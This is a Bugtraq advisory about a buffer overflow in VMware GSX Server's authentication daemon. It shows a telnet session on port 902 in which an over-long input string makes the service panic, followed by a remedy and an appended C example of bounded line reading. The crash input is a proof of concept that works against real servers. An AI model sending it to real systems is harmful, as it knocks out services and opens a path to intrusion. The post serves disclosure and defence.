Bugtraq mailing list archives

VMWare GSX Server Authentication Server Buffer Overflow Vulnerability - Update
From: Darryl Swofford <dswofford () kpmg com>
Date: 31 Oct 2003 16:28:55 -0000



Author: Darryl Swofford
Email: dswofford () kpmg com

Date: 2003/10/31

System:
VMware GSX Server 2.0.1 build-2129 for Windows (other versions not tested). Tested on Windows NT/2000/2003/XP systems.

Description:
After reviewing BugTraq #5294 (VMWare GSX Server Authentication Server Buffer Overflow Vulnerability) I was able to 
modify the sample code to exploit the updated vmware-authd service.

I will not release the source code as I feel this is not prudent until the vendor acknowledges the issue. Until then 
you can view the overflow by using telnet with the following syntax and simply alter the code as I did. 

telnet VMserver.somecompany.com 902
220 VMware Authentication Daemon Version 1.00
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA599
 vmware-authd
 PANIC: Buffer overflow in VMAuthdSocketRead()

Connection to host lost.


Analysis:
It seems that the vmware-authd service limits the input strings of the program when passed correct arguments (USER, 
PASS, GLOBAL); however, the initial readline can be overflowed as it does not control the amount of data passed to it. 
 
Remedy:
Stop and disable the VMware authorization service. 
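
Added example, not part of the original post and not VMware's code: a line reader that enforces the length bound on the first read, before any command is recognised, which is the check the Analysis section says is missing. The names (LINE_MAX_LEN, struct src, read_line_bounded, handle_next_line), the 256-byte cap and the "COMMAND argument" syntax are assumptions; an in-memory source stands in for the socket.

```c
#include <stdio.h>
#include <string.h>

#define LINE_MAX_LEN 256 /* assumed cap, not a value from the advisory */

enum line_status { LINE_OK = 0, LINE_TOO_LONG = -1, LINE_EOF = -2 };

/* In-memory stand-in for the socket so the example runs offline. */
struct src { const char *data; size_t len, pos; };

static int src_getc(struct src *s) {
    return s->pos < s->len ? (unsigned char)s->data[s->pos++] : -1;
}

/* Read one LF-terminated line into out[cap] (cap includes CR and NUL).
 * The bound is enforced on every byte, before any command is parsed;
 * an over-long line is drained to its LF and reported, never stored. */
enum line_status read_line_bounded(struct src *s, char *out, size_t cap) {
    size_t n = 0;
    int c, too_long = (cap == 0);
    while ((c = src_getc(s)) != -1) {
        if (c == '\n') {
            if (too_long) return LINE_TOO_LONG;
            if (n > 0 && out[n - 1] == '\r') n--;
            out[n] = '\0';
            return LINE_OK;
        }
        if (!too_long && n + 1 < cap) out[n++] = (char)c;
        else too_long = 1;
    }
    return LINE_EOF; /* stream ended without a complete line */
}

/* 1 = recognised command, 0 = unknown command, -1 = drop the connection. */
int handle_next_line(struct src *s) {
    static const char *cmds[] = { "USER ", "PASS ", "GLOBAL " };
    char line[LINE_MAX_LEN];
    if (read_line_bounded(s, line, sizeof line) != LINE_OK) return -1;
    for (size_t i = 0; i < sizeof cmds / sizeof cmds[0]; i++)
        if (strncmp(line, cmds[i], strlen(cmds[i])) == 0) return 1;
    return 0;
}

int main(void) {
    struct src s = { "USER alice\r\n", 12, 0 }; /* constructed sample input */
    printf("%d\n", handle_next_line(&s));
    return 0;
}
```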

